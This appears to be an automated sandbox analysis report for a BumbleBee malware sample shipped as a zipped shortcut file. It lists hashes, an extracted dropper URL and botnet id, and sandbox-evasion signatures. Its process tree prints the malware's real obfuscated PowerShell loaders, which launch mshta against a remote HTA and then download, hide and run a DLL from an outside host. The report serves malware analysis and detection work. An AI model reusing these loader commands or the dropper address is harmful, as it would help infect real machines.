Analysis

  • max time kernel
    95s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    18/06/2022, 03:26

General

  • Target

    8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588.zip

  • Size

    3.1MB

  • MD5

    a515d83b2794491048040a28d85fe75d

  • SHA1

    fddb57bedf443d63f57d39e8dc0f07c9c520f8e2

  • SHA256

    8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588

  • SHA512

    f684bea03072dfc1c9cfb44ca5c63bbccb0a897d0b4ed59f0fcf4005eaa901d1143aca68b77544e748526a346879ecb0d988469ef3bac6bef7219aa14bc550b7

Malware Config

Extracted

  • Language
    hta
  • Source
    URLs
  • hta.dropper
    https://pidipurev.com/a1799.hta

Extracted

  • Family
    bumblebee
  • Botnet
    a17
  • C2


rc4.plain

Signatures

  • BumbleBee

    BumbleBee is a webshell malware written in C++.

  • Enumerates VirtualBox registry keys 2 TTPs 5 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588.zip
    1⤵
      PID:1596
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:3204
      • C:\Program Files\7-Zip\7zG.exe
        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588\" -spe -an -ai#7zMap29216:208:7zEvent16926
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:3188
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $uVOFxPZI = [convert]::FromBase64String('enZr');$SvjOMbNF = [convert]::FromBase64String('XkBbR1ITW0dHQ0AJHBxDWldaQ0ZBVkUdUFxeHFICBAoKHVtHUg==');$OFVQWJMp = -join($uVOFxPZI | % {[char] ($_ -bxor 0x33)});$ZwhCtgVk = -join ($SvjOMbNF | % { [char] ($_ -bxor 0x33)});sal idMJYXuL $OFVQWJMp;idMJYXuL $ZwhCtgVk
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:836
        • C:\Windows\system32\mshta.exe
          "C:\Windows\system32\mshta.exe" https://pidipurev.com/a1799.hta
          2⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:864
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function cWJskuQlbOmpMA($ukeBbVmYNH, $EFucjtI){[IO.File]::WriteAllBytes($ukeBbVmYNH, $EFucjtI)};function zyZFKJmgHX($ukeBbVmYNH){if($ukeBbVmYNH.EndsWith((tXhPzTmXMFNFufDI @(68534,68588,68596,68596))) -eq $True){Start-Process (tXhPzTmXMFNFufDI @(rundll32.exe $ukeBbVmYNH ,TSErsNqyhR ))}elseif($ukeBbVmYNH.EndsWith((tXhPzTmXMFNFufDI @(68534,68600,68603,68537))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ukeBbVmYNH}else{Start-Process $ukeBbVmYNH}};function kpcQqRGkdksJXcLvOm($cWJskuQlbOmpMA){$jXeMAsDGusrM=(tXhPzTmXMFNFufDI @(68560,68593,68588,68588,68589,68598));$PlebPQOXHehbVKBBhSo=(Get-ChildItem $cWJskuQlbOmpMA -Force);$PlebPQOXHehbVKBBhSo.Attributes=$PlebPQOXHehbVKBBhSo.Attributes -bor ([IO.FileAttributes]$jXeMAsDGusrM).value__};function CnfznBhFm($qmukbsVTysBgrFlHF){$XovuEuCBHyBHjrpc = New-Object (tXhPzTmXMFNFufDI @(68566,68589,68604,68534,68575,68589,68586,68555,68596,68593,68589,68598,68604));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$EFucjtI = $XovuEuCBHyBHjrpc.DownloadData($qmukbsVTysBgrFlHF);return $EFucjtI};function tXhPzTmXMFNFufDI($cIhrmkNsmwm){$CcKhtridtJs=68488;$mssiUtTLO=$Null;foreach($AMEOxEPSnbDIIHAZ in $cIhrmkNsmwm){$mssiUtTLO+=[char]($AMEOxEPSnbDIIHAZ-$CcKhtridtJs)};return $mssiUtTLO};function wRHQAOwSkVoz(){$DQTYahmqYv = $env:AppData + '\';;$bCCPiHWusHeO = $DQTYahmqYv + '';If(Test-Path -Path $bCCPiHWusHeO){Invoke-Item $bCCPiHWusHeO;}Else{ $eSzamRIZLBTJ = CnfznBhFm (tXhPzTmXMFNFufDI @(68592,68604,68604,68600,68603,68546,68535,68535));cWJskuQlbOmpMA $bCCPiHWusHeO $eSzamRIZLBTJ;Invoke-Item $bCCPiHWusHeO;}$CRGBhJNKWPuzGc = $DQTYahmqYv + 'a17_cr99.dll'; if (Test-Path -Path $CRGBhJNKWPuzGc){zyZFKJmgHX $CRGBhJNKWPuzGc;}Else{ $FKoBPFKAjO = CnfznBhFm (tXhPzTmXMFNFufDI @(68592,68604,68604,68600,68603,68546,68535,68535,68600,68593,68588,68593,68600,68605,68602,68589,68606,68534,68587,68599,68597,68535,68585,68537,68543,68583,68587,68602,68545,68545,68534,68588,68596,68596));cWJskuQlbOmpMA $CRGBhJNKWPuzGc $FKoBPFKAjO;zyZFKJmgHX $CRGBhJNKWPuzGc;};kpcQqRGkdksJXcLvOm $CRGBhJNKWPuzGc;;;;;}wRHQAOwSkVoz;
            3⤵
            • Blocklisted process makes network request
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:396
            • C:\Windows\system32\rundll32.exe
              "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a17_cr99.dll TSErsNqyhR
              4⤵
              • Enumerates VirtualBox registry keys
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Looks for VirtualBox Guest Additions in registry
              • Checks BIOS information in registry
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              PID:3996

      Network

      MITRE ATT&CK Enterprise v6

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        e1fb26de120faadab3c093b78644964f

        SHA1

        bb587dd3b1ad8384b6d612bc4bb806f41562982f

        SHA256

        e1ce351162cae7e8671f980192da54b8440d309985687d8eef56fec0b3180a85

        SHA512

        6e4d18e9506e72f90aea0c93d190b9817566bbbfa2409c1ae6ca98c2b81f8a2bd4204270ce951444d49dfc85c9f1b913952afe6b8fceea918dd97006cf322518

      • C:\Users\Admin\AppData\Local\Temp\8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588\PRD.lnk

        Filesize

        1.9MB

        MD5

        6d3b37ea0e22cb04d9227dee552663f4

        SHA1

        2e1d39395fc36693d2abff8709db4261909e7cda

        SHA256

        9c4cfd85af061badf6bab38ace88be3a6a21e64fd99571eee8e93fed745261f9

        SHA512

        3089cecd1b4fb2c843aec61f1cb5a28f8c1052c5ff7296301a6702050b0916b847f199bf78134d88bca1797eabfa70721a9d26d425bc50053018954e290302c7

      • C:\Users\Admin\AppData\Roaming\a17_cr99.dll

        Filesize

        1.6MB

        MD5

        f72e0a5bc11cf1b2f5446c27e98049dd

        SHA1

        ca695374c77d62cdbd87ef88f3ad646b9e799614

        SHA256

        3d62ffeaa997dd7e6bdfa072e71a47241960524b31b64a168ca59d69ff680437

        SHA512

        ea23b03ed49f4e31e713845357e22f896f07ad5637df71b9e97976cb1c235beb3f30579697a156b477f3b38edc6bc133fe03b5c98754dc102575a7a4679f3825

      • memory/396-138-0x00007FFB8C760000-0x00007FFB8D221000-memory.dmp

        Filesize

        10.8MB

      • memory/396-142-0x00007FFB8C760000-0x00007FFB8D221000-memory.dmp

        Filesize

        10.8MB

      • memory/836-134-0x00007FFB8CEC0000-0x00007FFB8D981000-memory.dmp

        Filesize

        10.8MB

      • memory/836-131-0x0000020778F50000-0x0000020778F72000-memory.dmp

        Filesize

        136KB

      • memory/3996-143-0x000001D5445E0000-0x000001D5446F7000-memory.dmp

        Filesize

        1.1MB

      • memory/3996-144-0x00007FFBAF4E0000-0x00007FFBAF4F0000-memory.dmp

        Filesize

        64KB